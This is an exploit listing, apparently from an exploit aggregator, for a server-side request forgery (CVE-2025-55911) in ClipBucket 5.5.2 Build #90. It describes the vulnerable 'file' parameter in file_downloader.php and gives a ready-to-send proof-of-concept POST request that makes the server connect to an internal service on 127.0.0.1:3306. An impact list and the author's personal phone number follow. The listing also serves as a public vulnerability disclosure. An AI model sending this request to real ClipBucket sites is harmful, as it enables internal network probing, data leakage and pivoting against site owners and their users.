Exploit for 📄 ClipBucket 5.5.2 Build 90 Server-Side Request Forgery CVE-2025-55911

## https://sploitus.com/exploit?id=PACKETSTORM:211129
# Exploit Title: ClipBucket 5.5.2 Build #90 - Server-Side Request Forgery (SSRF)
    # Google Dork: N/A
    # Date: 2025-09-11
    # Exploit Author: Mukundsinh Solanki (r00td3str0y3r)
    # Vendor Homepage: https://clipbucket.com
    # Software Link: https://github.com/MacWarrior/clipbucket-v5
    # Version: 5.5.2 Build #90
    # Tested on: Ubuntu 20.04 LTS, PHP 7.4
    # CVE: CVE-2025-55911
    
    ## Vulnerability Description:
    An authenticated user with regular permissions can exploit a Server-Side
    Request Forgery (SSRF) vulnerability via the `file` parameter in
    `actions/file_downloader.php`. By supplying a crafted URL, attackers can
    force the server to make arbitrary HTTP requests to internal services or
    external systems. This can lead to internal network enumeration, data
    exfiltration, or pivoting attacks.
    
    ## PoC Request:
    
    POST /upload/actions/file_downloader.php HTTP/1.1
    Host: victim.com
    Content-Type: application/x-www-form-urlencoded
    Cookie: PHPSESSID=validsession
    
    file=http://127.0.0.1:3306/test.mp4
    
    
    
    
    The server attempts to connect to the internal service (`127.0.0.1:3306`),
    demonstrating SSRF.
    
    ## Impact:
    - Internal service enumeration
    - Potential metadata leakage
    - Pivoting to internal systems
    
    
    Regards,
    Mukundsinh Solanki
    +916355251151